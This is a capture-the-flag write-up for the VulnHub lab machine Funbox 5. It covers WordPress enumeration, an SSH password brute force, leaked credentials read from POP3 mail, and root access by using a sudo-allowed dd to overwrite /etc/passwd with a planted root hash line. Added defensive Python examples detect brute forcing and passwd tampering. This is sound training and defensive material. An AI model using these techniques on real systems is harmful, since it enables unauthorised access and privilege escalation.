VulnHub machine: funbox 5

Kali: 192.168.231.135

Target: 192.168.231.190

1. Get the target's IP address

2. Check which ports the target has open

Ports 22 and 80 are open.

3. Visit the target website

Nothing of interest.

4. Run a directory scan

The scan turns up a drupal directory and two txt pages; visit them.

The two txt pages contain nothing useful.

Visiting the /drupal directory redirects to 192.168.178.33.

Scan the /drupal directory with dirb:

┌──(lonelyor㉿Kali)-[~]
└─$ dirb http://192.168.231.190/drupal/ 

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Wed Feb 28 10:49:23 2024
URL_BASE: http://192.168.231.190/drupal/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://192.168.231.190/drupal/ ----
+ http://192.168.231.190/drupal/index.php (CODE:200|SIZE:62847)                                                                                             
==> DIRECTORY: http://192.168.231.190/drupal/wp-admin/                                                                                                      
==> DIRECTORY: http://192.168.231.190/drupal/wp-content/                                                                                                    
==> DIRECTORY: http://192.168.231.190/drupal/wp-includes/                                                                                                   
+ http://192.168.231.190/drupal/xmlrpc.php (CODE:405|SIZE:42)                                                                                               
                                                                                                                                                            
---- Entering directory: http://192.168.231.190/drupal/wp-admin/ ----
+ http://192.168.231.190/drupal/wp-admin/admin.php (CODE:302|SIZE:0)                                                                                        
==> DIRECTORY: http://192.168.231.190/drupal/wp-admin/css/                                                                                                  
==> DIRECTORY: http://192.168.231.190/drupal/wp-admin/images/                                                                                               
==> DIRECTORY: http://192.168.231.190/drupal/wp-admin/includes/                                                                                             
+ http://192.168.231.190/drupal/wp-admin/index.php (CODE:302|SIZE:0)                                                                                        
==> DIRECTORY: http://192.168.231.190/drupal/wp-admin/js/                                                                                                   
==> DIRECTORY: http://192.168.231.190/drupal/wp-admin/maint/                                                                                                
==> DIRECTORY: http://192.168.231.190/drupal/wp-admin/network/                                                                                              
==> DIRECTORY: http://192.168.231.190/drupal/wp-admin/user/                                                                                                 
                                                                                                                                                            
---- Entering directory: http://192.168.231.190/drupal/wp-content/ ----
+ http://192.168.231.190/drupal/wp-content/index.php (CODE:200|SIZE:0)                                                                                      
==> DIRECTORY: http://192.168.231.190/drupal/wp-content/languages/                                                                                          
==> DIRECTORY: http://192.168.231.190/drupal/wp-content/plugins/                                                                                            
==> DIRECTORY: http://192.168.231.190/drupal/wp-content/themes/                                                                                             
==> DIRECTORY: http://192.168.231.190/drupal/wp-content/upgrade/                                                                                            
==> DIRECTORY: http://192.168.231.190/drupal/wp-content/uploads/                                                                                            
                                                                                                                                                            
---- Entering directory: http://192.168.231.190/drupal/wp-includes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                                            
---- Entering directory: http://192.168.231.190/drupal/wp-admin/css/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                                            
---- Entering directory: http://192.168.231.190/drupal/wp-admin/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                                            
---- Entering directory: http://192.168.231.190/drupal/wp-admin/includes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                                            
---- Entering directory: http://192.168.231.190/drupal/wp-admin/js/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                                            
---- Entering directory: http://192.168.231.190/drupal/wp-admin/maint/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                                            
---- Entering directory: http://192.168.231.190/drupal/wp-admin/network/ ----
+ http://192.168.231.190/drupal/wp-admin/network/admin.php (CODE:302|SIZE:0)                                                                                
+ http://192.168.231.190/drupal/wp-admin/network/index.php (CODE:302|SIZE:0)                                                                                
                                                                                                                                                            
---- Entering directory: http://192.168.231.190/drupal/wp-admin/user/ ----
+ http://192.168.231.190/drupal/wp-admin/user/admin.php (CODE:302|SIZE:0)                                                                                   
+ http://192.168.231.190/drupal/wp-admin/user/index.php (CODE:302|SIZE:0)                                                                                   
                                                                                                                                                            
---- Entering directory: http://192.168.231.190/drupal/wp-content/languages/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                                            
---- Entering directory: http://192.168.231.190/drupal/wp-content/plugins/ ----
+ http://192.168.231.190/drupal/wp-content/plugins/index.php (CODE:200|SIZE:0)                                                                              
                                                                                                                                                            
---- Entering directory: http://192.168.231.190/drupal/wp-content/themes/ ----
+ http://192.168.231.190/drupal/wp-content/themes/index.php (CODE:200|SIZE:0)                                                                               
                                                                                                                                                            
---- Entering directory: http://192.168.231.190/drupal/wp-content/upgrade/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                                            
---- Entering directory: http://192.168.231.190/drupal/wp-content/uploads/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                               
-----------------
END_TIME: Wed Feb 28 10:50:14 2024
DOWNLOADED: 32284 - FOUND: 11

Judging by the scan results (wp-admin, wp-content and wp-includes directories), the site's CMS looks like WordPress rather than Drupal.

5. Visit the /drupal/index.php page

It really is WordPress.

6. Enumerate users with wpscan

┌──(lonelyor㉿Kali)-[~]
└─$ wpscan --url http://192.168.231.190/drupal/index.php --wp-content-dir=192.168.231.190/drupal/wp-content -e u
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.22
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[i] It seems like you have not updated the database for some time.
[?] Do you want to update now? [Y]es [N]o, default: [N]n
[+] URL: http://192.168.231.190/drupal/index.php/ [192.168.231.190]
[+] Started: Wed Feb 28 11:27:24 2024

Interesting Finding(s):

[+] Headers
 | Interesting Entry: Server: Apache/2.4.18 (Ubuntu)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] WordPress version 5.5.1 identified (Insecure, released on 2020-09-01).
 | Found By: Emoji Settings (Passive Detection)
 |  - http://192.168.231.190/drupal/index.php/, Match: 'wp-includes\/js\/wp-emoji-release.min.js?ver=5.5.1'
 | Confirmed By: Meta Generator (Passive Detection)
 |  - http://192.168.231.190/drupal/index.php/, Match: 'WordPress 5.5.1'

[i] The main theme could not be detected.

[+] Enumerating Users (via Passive and Aggressive Methods)
 Brute Forcing Author IDs - Time: 00:00:00 <===============================================================================> (10 / 10) 100.00% Time: 00:00:00

[i] User(s) Identified:

[+] admin
 | Found By: Wp Json Api (Aggressive Detection)
 |  - http://192.168.231.190/drupal/index.php/wp-json/wp/v2/users/?per_page=100&page=1
 | Confirmed By:
 |  Rss Generator (Aggressive Detection)
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)

[+] ben
 | Found By: Wp Json Api (Aggressive Detection)
 |  - http://192.168.231.190/drupal/index.php/wp-json/wp/v2/users/?per_page=100&page=1
 | Confirmed By:
 |  Rss Generator (Aggressive Detection)
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Wed Feb 28 11:29:04 2024
[+] Requests Done: 54
[+] Cached Requests: 8
[+] Data Sent: 13.761 KB
[+] Data Received: 1.257 MB
[+] Memory used: 158.688 MB
[+] Elapsed time: 00:01:39

Two users are enumerated: admin and ben.

7. Brute-force the password with hydra

ben's password is found: pookie
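From the defender's side, the password guessing in this step leaves a very visible trace: a burst of "Failed password" lines from one source in the SSH daemon's auth log, followed by an "Accepted password" once the guess lands. The following detector is an added example written for this write-up, not code from the original post; the log lines are constructed to look like OpenSSH messages via syslog (the year is assumed, because that timestamp format carries none) and were not captured from the Funbox 5 machine.

```python
"""Detect SSH password brute forcing in auth.log-style lines.

Added example for this write-up; not part of the original post. SAMPLE_LOG
is constructed, not captured from the target machine.
"""
import re
from collections import defaultdict
from datetime import datetime

# OpenSSH failure/success lines as sshd writes them through syslog
# (format assumption: traditional syslog timestamp without a year).
FAILED_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+\s[\d:]{8})\s\S+\ssshd\[\d+\]:\s"
    r"Failed password for (?:invalid user )?(?P<user>\S+) from (?P<ip>[\d.]+)"
)
ACCEPTED_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+\s[\d:]{8})\s\S+\ssshd\[\d+\]:\s"
    r"Accepted password for (?P<user>\S+) from (?P<ip>[\d.]+)"
)

# Constructed sample: one guessing burst that ends in a success, plus one
# ordinary typo-then-login from another host that should not be flagged.
SAMPLE_LOG = """\
Feb 28 11:40:01 funbox5 sshd[2101]: Failed password for ben from 192.168.231.135 port 40122 ssh2
Feb 28 11:40:01 funbox5 sshd[2103]: Failed password for ben from 192.168.231.135 port 40124 ssh2
Feb 28 11:40:02 funbox5 sshd[2105]: Failed password for invalid user admin from 192.168.231.135 port 40126 ssh2
Feb 28 11:40:02 funbox5 sshd[2107]: Failed password for ben from 192.168.231.135 port 40128 ssh2
Feb 28 11:40:03 funbox5 sshd[2109]: Failed password for ben from 192.168.231.135 port 40130 ssh2
Feb 28 11:40:03 funbox5 sshd[2111]: Failed password for ben from 192.168.231.135 port 40132 ssh2
Feb 28 11:40:04 funbox5 sshd[2113]: Accepted password for ben from 192.168.231.135 port 40134 ssh2
Feb 28 11:45:10 funbox5 sshd[2200]: Failed password for maria from 192.168.231.50 port 51000 ssh2
Feb 28 11:47:30 funbox5 sshd[2210]: Accepted password for maria from 192.168.231.50 port 51002 ssh2
"""


def parse_ts(ts, year=2024):
    # syslog timestamps carry no year; assume one so time deltas can be computed.
    return datetime.strptime(f"{year} {ts}", "%Y %b %d %H:%M:%S")


def detect_bruteforce(log_text, threshold=5, window_seconds=60):
    """Return {source_ip: finding} for sources with at least `threshold`
    failed password attempts inside any `window_seconds` window.

    Each finding records the largest burst seen, the usernames tried, and
    which users had a successful login at or after the burst: that last
    case is the one that needs an incident response, not just a block."""
    failures = defaultdict(list)   # ip -> [(time, user)]
    successes = defaultdict(list)  # ip -> [(time, user)]
    for line in log_text.splitlines():
        m = FAILED_RE.match(line)
        if m:
            failures[m["ip"]].append((parse_ts(m["ts"]), m["user"]))
            continue
        m = ACCEPTED_RE.match(line)
        if m:
            successes[m["ip"]].append((parse_ts(m["ts"]), m["user"]))

    findings = {}
    for ip, events in failures.items():
        events.sort()
        start = 0
        for end in range(len(events)):
            # slide the window start forward until the burst fits in it
            while (events[end][0] - events[start][0]).total_seconds() > window_seconds:
                start += 1
            count = end - start + 1
            if count >= threshold and count > findings.get(ip, {}).get("failures", 0):
                burst = events[start:end + 1]
                last_fail = burst[-1][0]
                findings[ip] = {
                    "failures": count,
                    "window_start": burst[0][0],
                    "users": sorted({u for _, u in burst}),
                    "success_after": [u for t, u in successes.get(ip, []) if t >= last_fail],
                }
    return findings


if __name__ == "__main__":
    for ip, f in detect_bruteforce(SAMPLE_LOG).items():
        print(ip, f["failures"], "failures, users:", f["users"],
              "logged in afterwards:", f["success_after"] or "none")
```

On the sample, only 192.168.231.135 is reported (six failures against admin and ben within three seconds, then a successful login as ben); the single failed attempt from 192.168.231.50 stays below the threshold. In production the same logic sits behind fail2ban or sshd's own rate limiting, and the lasting fix for this step is the password policy (or keys only) rather than the detector.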

8. Connect over SSH

Login successful.

9. Look around

The user ben is in the mail group and has a mail folder in the home directory, so presumably a mail service is running.

Check with netstat:

Port 110 (POP3) is in the LISTEN state.

10. Try connecting to port 110

The connection succeeds and three mails are present.

Read the three mails:

list
+OK 3 messages:
1 403
2 391
3 578
.
retr 1
+OK 403 octets
Return-Path: <maria@funbox5.fritz.box>
Received: from funbox4 (localhost [127.0.0.1])
        by funbox5.fritz.box (8.15.2/8.15.2/Debian-3) with SMTP id 07VCk80g014898
        for ben@localhost; Mon, 31 Aug 2020 14:47:42 +0200
Date: Mon, 31 Aug 2020 14:46:08 +0200
From: maria@funbox5.fritz.box
Message-Id: <202008311247.07VCk80g014898@funbox5.fritz.box>

Hi Ben,
are you going to Jonas' party on Saturday?
.
retr 2
+OK 391 octets
Return-Path: <maria@funbox5.fritz.box>
Received: from funbox4 (localhost [127.0.0.1])
        by funbox5.fritz.box (8.15.2/8.15.2/Debian-3) with SMTP id 07VCk80h014898
        for ben@localhost; Mon, 31 Aug 2020 14:54:40 +0200
Date: Mon, 31 Aug 2020 14:54:40 +0200
From: maria@funbox5.fritz.box
Message-Id: <202008311254.07VCk80h014898@funbox5.fritz.box>

Hey Ben,

did you do all the updates?
.
retr 3
+OK 578 octets
Return-Path: <maria@funbox5.fritz.box>
Received: from funbox4 (localhost [127.0.0.1])
        by funbox5.fritz.box (8.15.2/8.15.2/Debian-3) with SMTP id 07VD43wQ015008
        for ben@localhost; Mon, 31 Aug 2020 15:04:40 +0200
Date: Mon, 31 Aug 2020 15:04:03 +0200
From: maria@funbox5.fritz.box
Message-Id: <202008311304.07VD43wQ015008@funbox5.fritz.box>

Hi Ben,

please come to my office at 10:00 a.m. We have a lot to talk about!
The new employees must be created. I've already finished Adam.
adam: qwedsayxc!
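The session above is a plain POP3 exchange: LIST and RETR get multi-line replies that end at a line holding a single ".", and any message line that itself starts with "." is byte-stuffed by the server with an extra "." (RFC 1939, section 3). The parser below reads such a captured transcript back into messages, which is handy when reviewing a session capture or a mailbox export. It is an added example written for this write-up, not code from the original post; the transcript it parses is constructed to mirror the shape of the session, not the real mails.

```python
"""Parse a captured POP3 client/server transcript into email messages.

Added example, not from the original post. SESSION is a constructed
transcript in the same shape as the one in the write-up.
"""
from email import message_from_string

# Constructed sample: a LIST, two RETRs, and one dot-stuffed body line.
SESSION = """\
list
+OK 2 messages:
1 120
2 98
.
retr 1
+OK 120 octets
From: maria@funbox5.fritz.box
Subject: party
Message-Id: <1@funbox5.fritz.box>

Hi Ben,
are you going to the party?
..dot-stuffed line
.
retr 2
+OK 98 octets
From: maria@funbox5.fritz.box
Subject: updates

did you do all the updates?
.
"""

# Commands whose +OK reply is always multi-line; LIST and UIDL are
# multi-line only when given no argument.
MULTILINE = {"RETR", "TOP", "CAPA"}


def parse_pop3_session(text):
    """Return {message_number: email.message.Message} for every RETR.

    Multi-line replies end at a line that is exactly '.', and a reply line
    beginning with '.' has one leading '.' removed (byte-stuffing)."""
    lines = text.splitlines()
    messages = {}
    i = 0
    while i < len(lines):
        cmd = lines[i].strip().split()
        i += 1
        if not cmd:
            continue
        verb = cmd[0].upper()
        multiline = verb in MULTILINE or (verb in ("LIST", "UIDL") and len(cmd) == 1)
        if not multiline:
            continue  # single-line status reply, nothing to collect
        if i >= len(lines) or not lines[i].startswith("+OK"):
            continue  # -ERR or truncated capture: no body follows
        i += 1
        body = []
        while i < len(lines) and lines[i] != ".":
            line = lines[i]
            body.append(line[1:] if line.startswith(".") else line)
            i += 1
        i += 1  # skip the terminating '.'
        if verb == "RETR":
            messages[int(cmd[1])] = message_from_string("\n".join(body) + "\n")
    return messages


if __name__ == "__main__":
    for num, msg in parse_pop3_session(SESSION).items():
        print(num, msg["From"], "|", msg["Subject"])
        print(msg.get_payload())
```

Headers come back through the standard email parser, so folded "Received:" continuation lines like those in the real session are handled without special casing; the dot-stuffed line in message 1 is restored to ".dot-stuffed line".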

11. A username and password turned up; try logging in as adam.

12. Use sudo -l to see which commands can be run as root

Three commands are listed: dd, de and df.

Look at privilege escalation with dd.

Use dd to copy /etc/passwd to the current directory.

Edit passwd; without execute permission there, download passwd to the local machine, edit it, and upload it back afterwards.

Generate a password hash of your own (for example for the password root) and append that line to the passwd file; before writing it, delete the existing root line.

┌──(lonelyor㉿Kali)-[~/funbox5]
└─$ sudo echo 'root:$6$QoX42cly5BuSvuON$tCVjJr7rZ.AW2MEsOkET.LDdgP/EkRoJXpsApB9Q2.pBXS7zy5FYW6COuYW0Xih5y5y060U83ZiKK1InV1eEY0:0:0:root:/root:/bin/bash' >> passwd 
                                                                                                                                                             
┌──(lonelyor㉿Kali)-[~/funbox5]
└─$ cat passwd     
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
syslog:x:104:108::/home/syslog:/bin/false
_apt:x:105:65534::/nonexistent:/bin/false
lxd:x:106:65534::/var/lib/lxd/:/bin/false
mysql:x:107:111:MySQL Server,,,:/nonexistent:/bin/false
messagebus:x:108:112::/var/run/dbus:/bin/false
uuidd:x:109:113::/run/uuidd:/bin/false
dnsmasq:x:110:65534:dnsmasq,,,:/var/lib/misc:/bin/false
postfix:x:111:117::/var/spool/postfix:/bin/false
dovecot:x:112:119:Dovecot mail server,,,:/usr/lib/dovecot:/bin/false
dovenull:x:113:120:Dovecot login user,,,:/nonexistent:/bin/false
sshd:x:114:65534::/var/run/sshd:/usr/sbin/nologin
maria:x:1000:1000:,,,:/home/maria:/bin/bash
ben:x:1001:1001:,,,:/home/ben:/bin/bash
smmta:x:115:123:Mail Transfer Agent,,,:/var/lib/sendmail:/bin/false
smmsp:x:116:124:Mail Submission Program,,,:/var/lib/sendmail:/bin/false
adam:x:1002:1002:,,,:/home/adam:/bin/bash
root:$6$QoX42cly5BuSvuON$tCVjJr7rZ.AW2MEsOkET.LDdgP/EkRoJXpsApB9Q2.pBXS7zy5FYW6COuYW0Xih5y5y060U83ZiKK1InV1eEY0:0:0:root:/root:/bin/bash

After editing, upload the file back.

Then use dd to overwrite /etc/passwd with the contents of /tmp/passwd.

Try logging in as root.

Got the flag.
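The escalation works because pam_unix checks the second field of /etc/passwd directly and only defers to /etc/shadow when that field is "x"; a hash planted there replaces the shadow entry. The audit below is an added example for this write-up, not code from the original post: it scans a passwd file for exactly the artefacts this step leaves behind (a hash or an empty password in the passwd field, a second UID 0 account, a duplicated username, a malformed line). SAMPLE_PASSWD is constructed; the hash in it is the one from the write-up, and the "backdoor" entry is made up to show the generalised check.

```python
"""Audit an /etc/passwd file for the kind of tampering shown in the write-up.

Added example, not part of the original post. SAMPLE_PASSWD is constructed;
pass a real path to audit_passwd_file to check a live system.
"""

# Password-field values that mean "no hash here" (defer to /etc/shadow, or
# account locked). Anything else is used directly by pam_unix.
SHADOWED = {"x", "*", "!", "!!"}

# Constructed sample: normal entries, then the planted root line from the
# write-up, an extra UID 0 account, and a line with too few fields.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
ben:x:1001:1001:,,,:/home/ben:/bin/bash
adam:x:1002:1002:,,,:/home/adam:/bin/bash
root:$6$QoX42cly5BuSvuON$tCVjJr7rZ.AW2MEsOkET.LDdgP/EkRoJXpsApB9Q2.pBXS7zy5FYW6COuYW0Xih5y5y060U83ZiKK1InV1eEY0:0:0:root:/root:/bin/bash
backdoor:x:0:0:helper:/root:/bin/bash
broken:x:1003:1003:/home/broken:/bin/sh
"""


def audit_passwd(text):
    """Return a list of (line_number, finding, detail) tuples."""
    findings = []
    seen = {}  # username -> first line it appeared on
    for lineno, raw in enumerate(text.splitlines(), 1):
        if not raw.strip():
            continue
        fields = raw.split(":")
        if len(fields) != 7:
            findings.append((lineno, "malformed", f"{len(fields)} fields"))
            continue
        name, pw, uid, gid, gecos, home, shell = fields
        if pw == "":
            findings.append((lineno, "empty_password", name))   # passwordless login
        elif pw not in SHADOWED:
            findings.append((lineno, "hash_in_passwd", name))   # bypasses /etc/shadow
        if uid == "0" and name != "root":
            findings.append((lineno, "extra_uid0", name))       # second superuser
        if name in seen:
            findings.append((lineno, "duplicate_user", name))   # later line wins on lookup
        seen[name] = lineno
    return findings


def audit_passwd_file(path="/etc/passwd"):
    with open(path, encoding="utf-8") as fh:
        return audit_passwd(fh.read())


if __name__ == "__main__":
    for lineno, finding, detail in audit_passwd(SAMPLE_PASSWD):
        print(f"line {lineno}: {finding}: {detail}")
```

On the sample this reports the planted root line twice (hash in the passwd field, duplicate username), the extra UID 0 account, and the malformed line. The check catches the result, not the cause: the cause is the sudo rule that lets a user run dd as root, which can copy over any file, so the real remediation is removing that rule and putting /etc/passwd and /etc/shadow under file integrity monitoring.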
